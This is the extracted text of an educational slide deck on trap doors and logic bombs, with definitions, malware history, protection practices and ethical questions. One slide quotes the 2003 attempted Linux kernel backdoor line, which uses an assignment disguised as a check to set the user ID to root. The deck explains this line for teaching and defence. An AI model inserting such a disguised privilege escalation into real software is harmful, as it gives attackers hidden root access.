Trap Doors & Logic BombsOverviewMalware TaxonomyTrap doorsLogic BombsBackdoor HistorySlide 7Slide 8Logic Bomb HistorySlide 10Slide 11ProtectionProtection ContinuedSlide 14Hacking in MediaEthical QuestionsLegitimate Logic BombsSummaryResourcesTrap Doors & Logic BombsWilliam DotsonOverviewMalware TaxonomyDefinitionsHistorical OverviewProtection MethodsEthical IssuesMalware TaxonomyTrapdoorTrojan HorseLogicBombVirus WormBacteriaNoHostNeedsHostMalwareTrap doorsMethod of bypassing normal authentication methodsRemains hidden to casual inspectionCan be a new program to be installedCan modify an existing programAlso known as Back DoorsLogic BombsPiece of code that executes itself when pre-defined conditions are metLogic Bombs that execute on certain days are known as Time BombsCode performs some “payload” not expected by the user.Shareware that deactivates itself are not logic bombs.Backdoor HistoryMade famous in the movie “War games”2003, an attempt was made to create a backdoor in the Linux KernelEarly versions of the Sobig Virus in 2003 installed backdoors to send its spam.MyDoom virus in early 2004 created a backdoor on port 3127 to send spamBackdoor HistoryNo one really knows often backdoors are inserted into softwareSome people speculate it is a prevalent practice in the industryMost backdoors are “obvious and clumsy”Backdoor HistoryThe attempted Linux backdoor is “more sophisticated”if ((options == (__WCLONE|__WALL)) && (current->uid = 0))retval = -EINVAL;Under casual inspection looks like it is just checking two flags, but actually setting the UID to rootRequired good knowledge of Linux KernelOnly caught because the part of code this line is contained in was modified manually rather than automatically as the section it was in was.Caught during a file integrity check near releaseLogic Bomb HistorySome of the very first viruses had logic bombsFriday the 13th Virus duplicated itself every Friday of the month and on the 13th causing slowdown on networksMichelangelo Virus, one of the first viruses to get news coverage, execute itself on March 6th and tried to damage hard-disksLogic Bomb History1985 a programmer at a insurance firm in Texas wrote a logic bomb that modified a data retrieval function to rewrite part of main memory, rename itself, relocate itself, then power down the computer.1992 a programmer at General Dynamics was fined $5,000 Dollars that he was going to come back later and charge to remove.Logic Bomb HistoryWin32.Kriz.3862 virus in 1999 executed itself on Christmas Day and causes serious damage by overwriting massive amounts of data on the hard disk and rewriting the BIOSIn 2000, a Deutsche Morgan Grenfell a securities trader who had initially been hired as a programmer was charged with inserting a logic bomb.ProtectionDifficult to prevent truly determined hackersRequires thorough commitment to quality assurance, strict separation of programming duties, and strict security practices after deployment.Protection ContinuedSegregate operations from programming and testingHave a carefully controlled process from for moving code into productionGive only operations staff write-access to production codeLock down production code so that is as close to impossible for unauthorized people to modify programsAssign responsibility for specific production programs to named positions in operationsMaintain a list of authorized programmers for authorized quality assurance officer before accepting changes to productionKeep records of exactly which modifications were installed when and at whose requestKeep audit trails running at all times and have them include a checksum not only be based on the record but the record that comes before it.Protection ContinuedSome of these seem more obvious than othersNot all of these practices are usedMany companies are not willing or are not able to commit the resources needed for quality assurance and extensive security measures.Hacking in MediaHackers are often glorified by the press and in the mediaHackers that get caught are often young and written off as misguided youthAnti-Hacking Laws have been enacted that dramatically increase the penalties for anyone caughtEthical QuestionsShould software producers be allowed to include Logic Bombs to ensure final payment?According to the government…no.But how many do? Probably a lot.Legitimate Logic BombsSoftware openly time-limitedProblems arise if company stops supporting this productProblems arise if a company goes out of businessSummaryTrap Doors can provide access to a system for unauthorized proceduresLogic Bombs execute malicious code at certain timeTotal Security is difficultHow unethical are these practices, should they ever be legal?ResourcesProtecting against program threats http://www.unix.org.ua/orelly/networking/puis/ch11_01.htmConway, Richard. 2 Code hacking : a developer's guide to network security 2004.A guide to protecting your computer systems from hackers. http://www.securitymanagement.com/library/Harden0201.htmlLogic Bombs. http://www.nwfusion.com/newsletters/sec/2002/01514405.htmlThwarted Linux backdoor hints at smarter hackers. http://www.securityfocus.com/news/7388Backdoor – Wikipedia, the Free
View Full Document